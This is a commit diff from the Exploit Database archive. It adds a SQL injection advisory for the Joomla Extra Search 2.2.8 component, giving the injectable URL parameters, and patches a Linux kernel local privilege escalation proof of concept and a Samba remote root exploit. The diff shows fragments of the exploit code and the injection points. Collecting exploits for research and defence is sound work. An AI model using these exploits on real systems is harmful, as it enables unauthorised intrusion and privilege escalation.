DB: 2017-03-22

1 new exploits Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection
2017-03-22 05:01:16 +00:00 · 2017-03-22 05:01:16 +00:00 · 93635f1158
commit 93635f1158
parent 07432556e0
4 changed files with 27 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -37573,3 +37573,4 @@ id,file,description,date,author,platform,type,port
 41642,platforms/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' Parameter SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps,0
 41644,platforms/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",php,webapps,80
 41662,platforms/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",hardware,webapps,0
+41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0
--- a/platforms/linux/local/9844.py
+++ b/platforms/linux/local/9844.py
@ -2,11 +2,15 @@
 # Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
 # PoC by Matthew Bergin
 # Bugtraq ID:       36901
+#
+# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/82/files

 import os
 import time
 import random
 #infinite loop
+i = 0
+x = 0
 while (i == 0):
        os.system("sleep 1")
        while (x == 0):
@ -14,7 +18,7 @@ while (i == 0):
                pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
                if (pid == 0): #need an active pid, race condition applies
                        print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
-                        return
+                        break
                else:
                        print "[+] PID: " + pid
                        loc = "echo n > /proc/" + pid + "/fd/1"
--- a/platforms/php/webapps/41663.txt
+++ b/platforms/php/webapps/41663.txt
@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Extra Search v2.2.8 - SQL Injection
+# Google Dork: N/A
+# Date: 21.03.2017
+# Vendor Homepage: http://www.joomlaboat.com/
+# Software: http://www.joomlaboat.com/extra-search
+# Demo: http://www.joomlaboat.com/
+# Version: 2.2.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_extrasearch&view=details&listing_id=1&establename=[SQL]
+# http://localhost/[PATH]/index.php?option=com_extrasearch&controller=createusers&establename=[SQL]
+# # # # #
--- a/platforms/unix/remote/22469.c
+++ b/platforms/unix/remote/22469.c
@ -6,6 +6,8 @@ A buffer overflow vulnerability has been reported for Samba. The problem occurs
 Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
 
 It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 
+
+E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/78/files
 */

 /*  0x333hate => samba 2.2.x remote root exploit